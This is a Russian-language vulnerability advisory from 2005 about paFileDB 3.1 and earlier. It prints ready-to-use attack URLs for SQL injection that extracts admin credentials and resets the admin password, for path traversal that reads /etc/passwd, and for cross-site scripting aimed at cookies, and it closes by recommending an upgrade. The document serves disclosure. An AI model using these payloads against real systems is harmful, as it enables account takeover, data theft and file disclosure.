Множественные уязвимости в paFileDB

Дата публикации:
17.06.2005
Всего просмотров:
1111
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: paFileDB 3.1 и более ранние версии

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение, выполнить произвольные SQL команды в базе данных приложения, просмотреть и выполнить произвольные файлы на системе.

1. SQL-инъекция возможна из-за недостаточной обработки входных данных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных уязвимого приложения. Примеры:

http://[target]/pafiledb.php?action=admin&login=do&formname='%20UNION
%20SELECT%20admin_id,%20admin_username,%20'6f1ed002ab5595859014ebf095 1522d9',
%20admin_email,%20'1'%20FROM%20pafiledb_admin%20WHERE%20'1&formpass=blah&B1=
%3E%3E+Log+In+%3C%3C&action=admin&login=do

http://[target]/pafiledb.php?select= -99'%20UNION%20SELECT%200,admin_username,
admin_password,0,0,0,0%20FROM%20pafiledb_admin%20WHERE%201/*&B1=%3E%3E+Edit+
Category+%3C%3C&action=team&tm=category&category= edit&edit=form&menu1=%2F
pafiledb%2Fpafiledb.php%3Faction%3Dteam%26tm%3Dcategory%26category%3Dedit

http://[target]/pafiledb.php?id=-99'%20UNION%20SELECT%200,admin_use rname,
admin_password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20pafiledb_admin%20WHERE%
201/*&B1=%3E%3E+Edit+File+%3C%3C&action=team&tm=file&file=edit&edit=form&menu1
=%2 Fpafiledb%2Fpafiledb.php%3Faction%3Dteam%26tm%3Dfile%26file%3Dedit

http://[target]/pafiledb.php?action=team&tm=file&file=edit&id=1&edit=do&
query=UPDATE%20pafiledb_ad min%20SET%20admin_password%20=%20MD5%281337%28%
20WHERE%201/*

2. Уязвимость при обработке входных данных в параметре action сценария 'pafiledb.php' позволяет удаленному пользователю просмотреть и выполнить произвольные файлы на целевой системе. Пример:

http://[target]/pafiledb.php?action=../../../../etc/passwd%00&login=do

3. Межсайтовый скриптинг возможен из-за недостаточной фильтрации входных данных в некоторых параметрах. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:

http://[target]/pafiledb.php?ac tion=viewall&start=20&sortby=name%22
%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

http://[target]/pafiledb.php?action=category&id=1&filelist=%22%3E%3C
sc ript%3Ealert%28document.cookie%29%3C%2Fscript%3E

http://[target]/pafiledb.php?action=category&id=1&pages=%22%3E
%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

URL производителя: www.phparena.net/pafiledb.php

Решение: Установите последнюю версию с сайта производителя.

Ссылки: paFileDB Multiple Vulnerabilities

или введите имя

CAPTCHA